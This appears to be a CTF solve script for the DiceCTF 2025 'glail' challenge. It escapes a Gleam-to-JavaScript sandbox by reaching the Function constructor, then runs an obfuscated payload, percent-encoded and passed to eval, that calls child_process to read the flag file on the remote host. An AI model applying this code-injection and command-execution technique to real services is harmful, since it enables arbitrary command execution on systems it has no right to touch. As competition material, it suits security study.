Created
March 29, 2025 08:22
DiceCTF 2025 Quals - glail (misc)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
from pwn import *

# JavaScript that the submitted program asks the remote side to evaluate:
# it runs `cat flag.txt` through child_process and logs the output.
JS = """
import('child_process').then(r=>console.log(r.execSync('cat flag.txt')+''))
"""

# Percent-encode every character (the surrounding newlines included) and wrap
# the result in eval(decodeURIComponent(...)), which decodes it at run time.
# For this ASCII payload the substituted text is only '%' and hex digits.
percent_encoded = "".join("%{:02x}".format(ord(ch)) for ch in JS)
JS = "eval(decodeURIComponent('%s'))" % percent_encoded

# Source text sent to the service (the syntax appears to be Gleam). The single
# %s placeholder sits inside the string literal passed to `constructor(...)`.
# NOTE(review): indentation inside this string is reproduced as it appears in
# the listing, where the original leading whitespace was not preserved.
SOURCE_TEMPLATE = """
type Win = fn() -> Nil
pub type Dummy {
Dummy(constructor: fn(String) -> Win, d: fn() -> Dummy)
}
pub type Hax {
Hax(constructor: fn() -> Dummy, d: Dummy)
}
pub fn win() -> Nil {}
pub fn function_prototype(code: String) -> Win {
win
}
pub fn hax() -> Dummy {
Dummy(function_prototype, hax)
}
pub fn main() {
let dummy = Dummy(function_prototype, hax)
let x = Hax(hax, dummy)
let y = Hax(..x)
y.d.constructor("%s")()
}
""".strip()
CODE = SOURCE_TEMPLATE % JS
# print(CODE)

# The service prompts with ">>> " before each line of input.
# NOTE(review): the nesting below is reconstructed; the listing lost its
# indentation, so confirm the two trailing calls sit after the loop.
with remote("dicec.tf", 31333) as io:
    # Empty lines are skipped so that nothing blank is sent mid-program.
    for line in filter(None, CODE.split("\n")):
        io.sendlineafter(b">>> ", line.encode())
    # Sent once the whole program has been submitted.
    io.sendlineafter(b">>> ", b"\n")
    io.interactive()
# dice{5f45c2d75de6c5ee}